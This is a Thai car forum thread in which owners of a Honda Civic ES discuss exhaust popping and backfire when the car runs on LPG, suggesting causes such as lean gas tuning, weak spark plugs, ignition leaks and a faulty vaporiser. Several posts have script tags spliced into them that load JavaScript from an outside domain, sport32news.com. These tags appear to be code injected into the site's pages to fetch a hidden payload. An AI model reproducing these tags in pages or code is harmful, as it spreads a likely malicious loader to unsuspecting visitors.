ตอบ
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 00:08 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
พี่ๆช่วยด้วยคับes 02 exi ATเวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่ออะคับ ตกใจทุกที จะเป็นเฉพาะแก๊ซนะคับไปจูนแก๊ซกะช่างมา1วันไม่หาย ให้ช่างเช็คระบบแก๊สก็ไม่ปัญหาอะไร สุดท้ายสงสัยที่เจ้าแคตทาไลติกอะคับช่างบอกมันไม่มีคือต่อตรงมาเลย แล้วไม่มีเซนเซอร์ด้วยปกติต้องมีใช่ป่าวคับ ใช่สาเหตุที่ทำให้ระเบิดออกท่อป่าวคับผมละงงไปหมดแล้ว ช่วยหน่อยนะคับ จะพาแม่ไปไหนก็กลัวจะตกใจอะคับ
ได้รับคำขอบคุณจาก: khem_hatyai  Champ_civicES  mosonic 
onut0627


เข้าร่วม: 24 กันยา 2011
ตอบ: 179

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 208
ให้คำขอบคุณ: 87
เสาร์, 10 ธันวา 2011 00:27 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
รอผู้รู้พรุ้งนี้เช้าจร้า หายไวๆนะครับ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  civic03zaza  zoom  redza  Champ_civicES 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 00:57 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
คับรอความหวังค้าบ
ได้รับคำขอบคุณจาก: khem_hatyai  civic03zaza  redza  Champ_civicES 
jjim


ชื่อเล่น: จิ้ม

เข้าร่วม: 12 พฤศจิกา 2008
ตอบ: 1016

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1082
ให้คำขอบคุณ: 155

ที่อยู่: Chachoengsao
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 10 ธันวา 2011 01:13 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
สงสัยรถแรงครับเลยมีเสียงออก <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  civic03zaza  Champ_civicES 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 01:27 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
แหะๆ แรงแบบนี้ไม่ค่อยดีมั้งคับ แต่ก็สะใจดีคับ "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> วันนี้ตำรวจมองตามเลยจม 55 <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: khem_hatyai  Champ_civicES 
yorkydog


ชื่อเล่น: เปี๊ยก

เข้าร่วม: 09 กันยา 2010
ตอบ: 1353

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1470
ให้คำขอบคุณ: 2437

ที่อยู่: ABAC บางนา. โซนสมุทรปราการ
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 10 ธันวา 2011 02:25 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
jjim พิมพ์ว่า:
สงสัยรถแรงครับเลยมีเสียงออก <script src="https://sport32news.com/civicesgroup.js"></



ที่แรกคึดเหมือนผมเลย ไม่กล้าตอบกลัวจะโดน...555
เจอเจ้าตัวการเร็วๆนะครับ เดี๋ยวผู้รู้จะเข้ามาตอบ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  civic03zaza  Champ_civicES 
phichetza


ชื่อเล่น: เชษ

เข้าร่วม: 17 ตุลา 2011
ตอบ: 1590

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1420
ให้คำขอบคุณ: 3612

ที่อยู่: สุราษฎร์ธานี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 10 ธันวา 2011 07:06 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  Champ_civicES 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
เสาร์, 10 ธันวา 2011 07:51 - Re: เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
pakorn25 พิมพ์ว่า:
พี่ๆช่วยด้วยคับes 02 exi ATเวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่ออะคับ ตกใจทุกที จะเป็นเฉพาะแก๊ซนะคับไปจูนแก๊ซกะช่างมา1วันไม่หาย ให้ช่างเช็คระบบแก๊สก็ไม่ปัญหาอะไร สุดท้ายสงสัยที่เจ้าแคตทาไลติกอะคับช่างบอกมันไม่มีคือต่อตรงมาเลย แล้วไม่มีเซนเซอร์ด้วยปกติต้องมีใช่ป่าวคับ ใช่สาเหตุที่ทำให้ระเบิดออกท่อป่าวคับผมละงงไปหมดแล้ว ช่วยหน่อยนะคับ จะพาแม่ไปไหนก็กลัวจะตกใจอะคับ

ไม่เกี่ยวกับแคตเลย รถเค้าก็ไม่มีแคต เสียงระเบิดมาจากเสียงหัวเทียนบอด สังเกตุมอไซค์หรือตุ๊กๆจะมีเสียงระเบิดออกท่อเพราะการที่หัวเทียนบอดเผาไหม้ไม่หมดเวลาที่ส่วนผสมหนาแล้วจุดทีเดียวมันก็จะเป็นการระเบิด ลองแกะหัวเทียนดูและไล่ระบบไฟระบบจุดระเบิดใหม่น่าจะหาย อีกอย่างคืออาการที่เค้าเรียกว่า แบ็คไฟร์ คือการระเบิดย้อนของแก๊ส
แบคไฟร์ (Back Fire) เป็นอาการที่เกิดจากการสันดาปของเชื้อเพลิงภายนอกกระบอกสูบ เป็นเรื่องที่พบได้ทั้งเครื่องยนต์ที่ใช้แก๊สเป็นเชื้อเพลิง หรือแม้นกระทั่งเครื่องยนต์ที่ใช้น้ำมันเอง ก็มีบางครั้งที่จะพบเจอะอาการนี้ อาการเบื้องต้นที่เจอะจะมีการระเบิดย้อนภายในท่อร่วมไอดี อาจทำให้ระบบควบคุมประจุไอดีชำรุดได้ จำพวกมาตรวัดอากาศ (Air Flow) หรือลิ้นปีกผีเสื้อ

การเกิดแบคไฟร์ได้นั้นมีองค์ประกอบคือ เชื้อเพลิง และอ็อกซิเจนในอากาศ การเกิดแบคไฟร์ส่วนใหญ่จะเกิดในกรณีที่ส่วนผสมบางเกินไป จะเกิดในช่วงเวลาสั้นๆและจะเผาไหม้เชื้อเพลิงที่ตกค้างอยู่ภายในท่อร่วมไอดี ส่วนผสมของเชื้อเพลิงกับอากาศที่บางเกินไปจะมีค่าอ็อกซิเจนอยู่ในส่วนผสมมาก ส่วนผสมที่บางจะสันดาปตัวเองได้ง่ายเมื่อมีอุณหภูมิถึงจุดสันดาป โดยไม่ต้องพึ่งพาเปลวไฟจากเขี้ยวหัวเทียน การเกิดแบคไฟร์นั้นอาจเกิดได้ในเครื่องยนต์ที่ใช้น้ำมันเป็นเชื้อเพลิง เกิดในกรณีเดียวกันแทบทุกอย่าง แต่การฉีดเชื้อเพลิงในเครื่องยนต์เบ็นซินนั้นการฉีดจะบางได้มีอยู่ไม่กี่กรณี คือ ปั๊มเชื้อเพลิงแรงดันตก หัวฉีดเชื้อเพลิงทำงานผิดปกติ หรือ มาตรวัดอากาศประมวลผลผิด (เร่งเครื่องแต่จับสัญญาณการไหลของอากาศได้ต่ำกว่าความจริง) ถ้าในกรณีเครื่องยนต์ที่ใช้คาร์บูเรเตอร์จะเกิดจากการใช้ขนาดนมหนูน้ำมันที่ไม่เหมาะสม จากอาการข้างต้น การที่เราจะเอาระบบแก๊ส ไม่ว่าจะเป็น LPG หรือ NGV มาใช้ในรถยนต์นั้นองค์ประกอบที่เหมาะสมถึงจะแก้ไขปัญหาได้ ในระบบดูด ( Mixer ) ระบบพื้นฐานคล้ายคาร์บูเรเตอร์ ปากผสมจึงเป็นจุดหลักของอาการแบคไฟร์ และ มีหม้อต้ม เป็นตัวเสริมที่บ่งบอกว่าขนาดปากผสมนั้นเหมาะสมกันหรือไม่

ทำไมเครื่องยนต์สมัยใหม่เมื่อนำไปใส่ระบบดูดที่สามารถใช้กับเครื่องยนต์ที่มีความจุเท่ากัน แต่ยังเกิดอาการแบคไฟร์อยู่ การเกิดอาการแบคไฟร์ในระบบดูดที่ใช้กับเครื่องยนต์สมัยใหม่นั้น ส่วนใหญ่มักมีปัญหาจากระบบแปรผันวาวล์ไอดี ซึ่งเมื่อระบบนี้ทำงานจะทำให้ค่าการไหลของอากาศมากขึ้นโดยเฉียบพลัน ปกติการทำงานของระบบแปรผันวาวล์ถูกออกแบบมาให้เครื่องยนต์มีอัตราเร่งที่ดี แต่การเกิดแบคไฟร์ในเครื่องยนต์ทั่วๆไปนั้นก็มีความเสี่ยงในขณะที่ส่งคันเร่งเร็วๆในกรณีเร่งแซง แต่เมื่อถูกผนวกไปกับการปรับค่าการเปิดวาวล์ที่นานขึ้นทำให้ปริมาณอากาศที่ไหลผ่านมากขึ้นตามไปด้วยโดยที่หม้อต้มไม่สามารถที่จะชดเชยได้ทันก็จะเกิดอาการแบคไฟร์ได้โดยง่าย เรียกได้ว่าถ้าระบบเครื่องยนต์ที่มีการประจุไอดีที่ซับซ้อน ระบบดูดจึงไม่ใช้ทางเลือกที่ดีนัก

แต่อย่างไรก็ตามการเกิดแบค์ไฟร์นั้นอาจมีข้อปลีกย่อยจากตัวเครื่องยนต์เองอีกส่วนนึง อาการจากสายหัวเทียนรั่ว หรือ คอย์จุดระเบิดรั่ว(ในรถที่ใช้คอย์แยก) หรือแม้นแต่กระทั่งเขี้ยวหัวเทียนที่ห่าง ก็สามารถที่จะทำให้เกิดอาการแบคไฟร์ได้
tumrider


ชื่อเล่น: ตั้ม

เข้าร่วม: 18 กุมภา 2011
ตอบ: 816

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1109
ให้คำขอบคุณ: 1731

ที่อยู่: เมืองปราสาทหิน..ถิ่นภูเขาไฟ
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 10 ธันวา 2011 08:34 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  Champ_civicES 
bandai_join


เข้าร่วม: 23 กุมภา 2009
ตอบ: 3754

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6410
ให้คำขอบคุณ: 536

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 10 ธันวา 2011 09:14 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
โว๊ววว แม่ส้มจี๊ดเนี่ย ได้ใจผมจริงๆเล๊ยยย ผู้หญิงอะไร รู้เรื่องรถยังกะเกิดในห้องเครื่องยังไงยังงั้น

ผมเริ่มงง ล่ะ ว่าคุณส้มจี๊ดเนี่ย เป็นผู้ชายรึเปล่า ไหงถึงได้เก่งเกินหญิงซะขนาดนี้ ทั้งเก่งทั้งสวย <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: pakorn25  puyzaaaaa  khem_hatyai  okuma  Champ_civicES  A-u-T-o-N-o-m-Y  KAATO 
nooduean_69


ชื่อเล่น: นู๋เดือน

เข้าร่วม: 04 ตุลา 2011
ตอบ: 1224

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1496
ให้คำขอบคุณ: 3195

ที่อยู่: Minburi
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 10 ธันวา 2011 09:26 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  Champ_civicES 
OiShIz


ชื่อเล่น: ไดร์ฟ

เข้าร่วม: 13 พฤศจิกา 2009
ตอบ: 969

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1576
ให้คำขอบคุณ: 2107

ที่อยู่: กทม
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 10 ธันวา 2011 09:35 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
คุณส้มจี๊ด ข้อมูลแน่นจิงๆ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  Champ_civicES 
nokmodify


ชื่อเล่น: นกชลบุรี

เข้าร่วม: 08 กรกฎา 2010
ตอบ: 1415

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1292
ให้คำขอบคุณ: 282

ที่อยู่: เมืองชลบุรี
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
เสาร์, 10 ธันวา 2011 10:18 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
อาการแบคฟาย ตอนใช้แก๊ซ แก้ยากครับ แต่จะแก้ให้มันเป็นน้อยลงได้
ต้องจูนแก๊ซหนาๆครับ ไปบอกช่างจูนหนาๆ เพราะถ้าจูนหนาๆแก๊ซจะไม่ถูกเผาไหม้หมดก็จะส่งเชื้อเพลิงไปเลี้ยงที่ห้องเผาไห้มได้ตลอดเวลา แม้ยกคันเร่งแล้วก็ตาม

ถ้าจูนแก๊ซบางๆๆไว้ ผมดีคือ ประหยัดแก๊ซ ผมที่ตามมาคือ อาการแบคฟาย แปคฟายในที่นี้ของแก๊ซก็คือ หัวฉีดแก๊ซจ่ายแก๊ซออกมาพอดี หรือว่าบางไป ช่วงที่ยกคันเร่ง แก๊ซที่จูนมาบางก็จะเผาไห้มหมด จนไม่เหลือเชื้อเพลิงที่เลี้ยงห้องเผาไห้ม จึงทำให้ลูกสูบตัวที่จุดระเบิด ที่คลายอากาศ+แรงดันไปที่ไอเสีย จะแบคฟายกลับมายังห้องเผาไหม้อีกครับ จึงทำให้เกิด อากาศมากกว่าเชื้อเพลิง จึงมีเสียดัง ปั๊งๆๆครับ

ปล.ถ้าเป็นน้ำมัน จะจูนยังไงก้ไม่แบคฟาย ถ้าเป็นแก๊ซ จูนบางโอกาศแบคฟายมากครับ ขอบคุณครับ
ได้รับคำขอบคุณจาก: pakorn25  Juris  khem_hatyai  okuma  Champ_civicES  bank01 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 10:25 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
งั้นแสดงว่าเรื่องท่อน่าจะต้ดไปได้เลยใช่มั้ยคับ แก๊สผมก็ใช้หัวฉีดนะเปลี่ยนกรองหม้อต้มและนอกหม้อต้มแล้ว หัวเทียนก็ลองเปลี่ยนแล้วทั้งเบิก0 และแบบเข็ม คอล์ยลองเช็คเองคร่าวๆแล้วก็ไม่น่าเสียแต่ก็ไม่ช้วอะคับสวนสายหัวเทียนนี่มีวิธีเช็คยังไงคับอยากเช็คเองดู


แก้ไขล่าสุดโดย เมื่อ อังคาร, 13 มีนา 2012 11:00, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: khem_hatyai  Champ_civicES  bank01 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
เสาร์, 10 ธันวา 2011 10:30 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
pakorn25 พิมพ์ว่า:
ขอบคณคุณส้มจี้ดคับสวดยวดจิงๆ งั้นแสดงว่าเรื่องท่อน่าจะต้ดไปได้เลยใช่มั้ยคับ แก๊สผมก็ใช้หัวฉีดนะเปลี่ยนกรองหม้อต้มและนอกหม้อต้มแล้ว หัวเทียนก็ลองเปลี่ยนแล้วทั้งเบิก0 และแบบเข็ม คอล์ยลองเช็คเองคร่าวๆแล้วก็ไม่น่าเสียแต่ก็ไม่ช้วอะคับสวนสายหัวเทียนนี่มีวิธีเช็คยังไงคับอยากเช็คเองดู

เรื่องหัวเทียนกับระบบจุดระเบิดนี่ไม่ถนัดค่ะ พอดีใช้รถดีเซลมาตลอด มันไม่มีหัวเทียน เพิ่งมีรถเก๋งกะเค้า แค่สองคันนี้เอง รู้แค่คร่าวๆประมาณว่า เอาออกมาดูว่ามีจุดรั่วไหม ดูด้วยตาเปล่า กับอีกวิธีคือ ไปจอดรถที่มืดๆ สตาร์ทเครื่อง เปิดฝากระโปรงแล้วยืนดูว่ามีประกายไฟออกมาไหม ยังไงรอผู้รู้อีกทีค่ะ
อ้อ อีกที่นึงที่น่าสงสัยคือ หม้อต้มไม่รู้ว่าตอนเปลี่ยนกรอง เค้าประกอบดีไหม หม้อต้มอาจจะรั่ว หรือ ไม่สมบูรณ์ จ่ายแก๊สไม่ดีก็เป็นได้ ลองเข้าร้านจูนใหม่ดีกว่านะคะ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  okuma  Champ_civicES  bank01  KAATO 
FuckTong


ชื่อเล่น: เอ๋

เข้าร่วม: 21 เมษา 2011
ตอบ: 4394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2463
ให้คำขอบคุณ: 2244

ที่อยู่: Samutprakan
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 10 ธันวา 2011 10:37 - Re: เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
ham_ter พิมพ์ว่า:
pakorn25 พิมพ์ว่า:
พี่ๆช่วยด้วยคับes 02 exi ATเวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่ออะคับ ตกใจทุกที จะเป็นเฉพาะแก๊ซนะคับไปจูนแก๊ซกะช่างมา1วันไม่หาย ให้ช่างเช็คระบบแก๊สก็ไม่ปัญหาอะไร สุดท้ายสงสัยที่เจ้าแคตทาไลติกอะคับช่างบอกมันไม่มีคือต่อตรงมาเลย แล้วไม่มีเซนเซอร์ด้วยปกติต้องมีใช่ป่าวคับ ใช่สาเหตุที่ทำให้ระเบิดออกท่อป่าวคับผมละงงไปหมดแล้ว ช่วยหน่อยนะคับ จะพาแม่ไปไหนก็กลัวจะตกใจอะคับ

ไม่เกี่ยวกับแคตเลย รถเค้าก็ไม่มีแคต เสียงระเบิดมาจากเสียงหัวเทียนบอด สังเกตุมอไซค์หรือตุ๊กๆจะมีเสียงระเบิดออกท่อเพราะการที่หัวเทียนบอดเผาไหม้ไม่หมดเวลาที่ส่วนผสมหนาแล้วจุดทีเดียวมันก็จะเป็นการระเบิด ลองแกะหัวเทียนดูและไล่ระบบไฟระบบจุดระเบิดใหม่น่าจะหาย อีกอย่างคืออาการที่เค้าเรียกว่า แบ็คไฟร์ คือการระเบิดย้อนของแก๊ส
แบคไฟร์ (Back Fire) เป็นอาการที่เกิดจากการสันดาปของเชื้อเพลิงภายนอกกระบอกสูบ เป็นเรื่องที่พบได้ทั้งเครื่องยนต์ที่ใช้แก๊สเป็นเชื้อเพลิง หรือแม้นกระทั่งเครื่องยนต์ที่ใช้น้ำมันเอง ก็มีบางครั้งที่จะพบเจอะอาการนี้ อาการเบื้องต้นที่เจอะจะมีการระเบิดย้อนภายในท่อร่วมไอดี อาจทำให้ระบบควบคุมประจุไอดีชำรุดได้ จำพวกมาตรวัดอากาศ (Air Flow) หรือลิ้นปีกผีเสื้อ

การเกิดแบคไฟร์ได้นั้นมีองค์ประกอบคือ เชื้อเพลิง และอ็อกซิเจนในอากาศ การเกิดแบคไฟร์ส่วนใหญ่จะเกิดในกรณีที่ส่วนผสมบางเกินไป จะเกิดในช่วงเวลาสั้นๆและจะเผาไหม้เชื้อเพลิงที่ตกค้างอยู่ภายในท่อร่วมไอดี ส่วนผสมของเชื้อเพลิงกับอากาศที่บางเกินไปจะมีค่าอ็อกซิเจนอยู่ในส่วนผสมมาก ส่วนผสมที่บางจะสันดาปตัวเองได้ง่ายเมื่อมีอุณหภูมิถึงจุดสันดาป โดยไม่ต้องพึ่งพาเปลวไฟจากเขี้ยวหัวเทียน การเกิดแบคไฟร์นั้นอาจเกิดได้ในเครื่องยนต์ที่ใช้น้ำมันเป็นเชื้อเพลิง เกิดในกรณีเดียวกันแทบทุกอย่าง แต่การฉีดเชื้อเพลิงในเครื่องยนต์เบ็นซินนั้นการฉีดจะบางได้มีอยู่ไม่กี่กรณี คือ ปั๊มเชื้อเพลิงแรงดันตก หัวฉีดเชื้อเพลิงทำงานผิดปกติ หรือ มาตรวัดอากาศประมวลผลผิด (เร่งเครื่องแต่จับสัญญาณการไหลของอากาศได้ต่ำกว่าความจริง) ถ้าในกรณีเครื่องยนต์ที่ใช้คาร์บูเรเตอร์จะเกิดจากการใช้ขนาดนมหนูน้ำมันที่ไม่เหมาะสม จากอาการข้างต้น การที่เราจะเอาระบบแก๊ส ไม่ว่าจะเป็น LPG หรือ NGV มาใช้ในรถยนต์นั้นองค์ประกอบที่เหมาะสมถึงจะแก้ไขปัญหาได้ ในระบบดูด ( Mixer ) ระบบพื้นฐานคล้ายคาร์บูเรเตอร์ ปากผสมจึงเป็นจุดหลักของอาการแบคไฟร์ และ มีหม้อต้ม เป็นตัวเสริมที่บ่งบอกว่าขนาดปากผสมนั้นเหมาะสมกันหรือไม่

ทำไมเครื่องยนต์สมัยใหม่เมื่อนำไปใส่ระบบดูดที่สามารถใช้กับเครื่องยนต์ที่มีความจุเท่ากัน แต่ยังเกิดอาการแบคไฟร์อยู่ การเกิดอาการแบคไฟร์ในระบบดูดที่ใช้กับเครื่องยนต์สมัยใหม่นั้น ส่วนใหญ่มักมีปัญหาจากระบบแปรผันวาวล์ไอดี ซึ่งเมื่อระบบนี้ทำงานจะทำให้ค่าการไหลของอากาศมากขึ้นโดยเฉียบพลัน ปกติการทำงานของระบบแปรผันวาวล์ถูกออกแบบมาให้เครื่องยนต์มีอัตราเร่งที่ดี แต่การเกิดแบคไฟร์ในเครื่องยนต์ทั่วๆไปนั้นก็มีความเสี่ยงในขณะที่ส่งคันเร่งเร็วๆในกรณีเร่งแซง แต่เมื่อถูกผนวกไปกับการปรับค่าการเปิดวาวล์ที่นานขึ้นทำให้ปริมาณอากาศที่ไหลผ่านมากขึ้นตามไปด้วยโดยที่หม้อต้มไม่สามารถที่จะชดเชยได้ทันก็จะเกิดอาการแบคไฟร์ได้โดยง่าย เรียกได้ว่าถ้าระบบเครื่องยนต์ที่มีการประจุไอดีที่ซับซ้อน ระบบดูดจึงไม่ใช้ทางเลือกที่ดีนัก

แต่อย่างไรก็ตามการเกิดแบค์ไฟร์นั้นอาจมีข้อปลีกย่อยจากตัวเครื่องยนต์เองอีกส่วนนึง อาการจากสายหัวเทียนรั่ว หรือ คอย์จุดระเบิดรั่ว(ในรถที่ใช้คอย์แยก) หรือแม้นแต่กระทั่งเขี้ยวหัวเทียนที่ห่าง ก็สามารถที่จะทำให้เกิดอาการแบคไฟร์ได้

มาแบบแน่นๆ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  Champ_civicES 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 10:43 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
คับ


แก้ไขล่าสุดโดย เมื่อ อังคาร, 13 มีนา 2012 11:12, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: khem_hatyai  Champ_civicES 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 11:04 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
คับ


แก้ไขล่าสุดโดย เมื่อ อังคาร, 13 มีนา 2012 11:15, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: khem_hatyai  Champ_civicES 
nilkung


ชื่อเล่น: นิล

เข้าร่วม: 21 กุมภา 2010
ตอบ: 1477

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1466
ให้คำขอบคุณ: 1317

ที่อยู่: หัวหิน-ปราณบุรี
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
เสาร์, 10 ธันวา 2011 11:21 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
ผมว่าไม่ใช่แบ๊คไฟร์นะ ถ้ามันเกิดละก็ กรองอากาศคุณเป็นรูโบ๋ใหญ่ๆแน่ แล้วเสียงจะดังมาจากข้างหน้า ที่ จขกท. เล่าคิดว่าเขาได้ยินจากปลายท่อด้านหลัง อาการนี้น่าจะเกิดจากการเผาไหม้ไม่สมบูรณ์นะ เปลี่ยนร้านจูนแก๊สใหม่คับ
ได้รับคำขอบคุณจาก: pakorn25  khem_hatyai  okuma  zan  Champ_civicES  BEER_CIVIC ES 
pakorn25


ชื่อเล่น: แป๊๊ก

เข้าร่วม: 11 ตุลา 2011
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 179
ให้คำขอบคุณ: 461

ที่อยู่: ชลบุรี-บางแสน-ระยอง
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
เสาร์, 10 ธันวา 2011 11:25 - เวลาวิ่งที่ประมาณ 120 กม./ชม. แล้วยกคันเร่งจะมีเสียงระเบิดออกทีท่่อคับ
nokmodify พิมพ์ว่า:
อาการแบคฟาย ตอนใช้แก๊ซ แก้ยากครับ แต่จะแก้ให้มันเป็นน้อยลงได้
ต้องจูนแก๊ซหนาๆครับ ไปบอกช่างจูนหนาๆ เพราะถ้าจูนหนาๆแก๊ซจะไม่ถูกเผาไหม้หมดก็จะส่งเชื้อเพลิงไปเลี้ยงที่ห้องเผาไห้มได้ตลอดเวลา แม้ยกคันเร่งแล้วก็ตาม

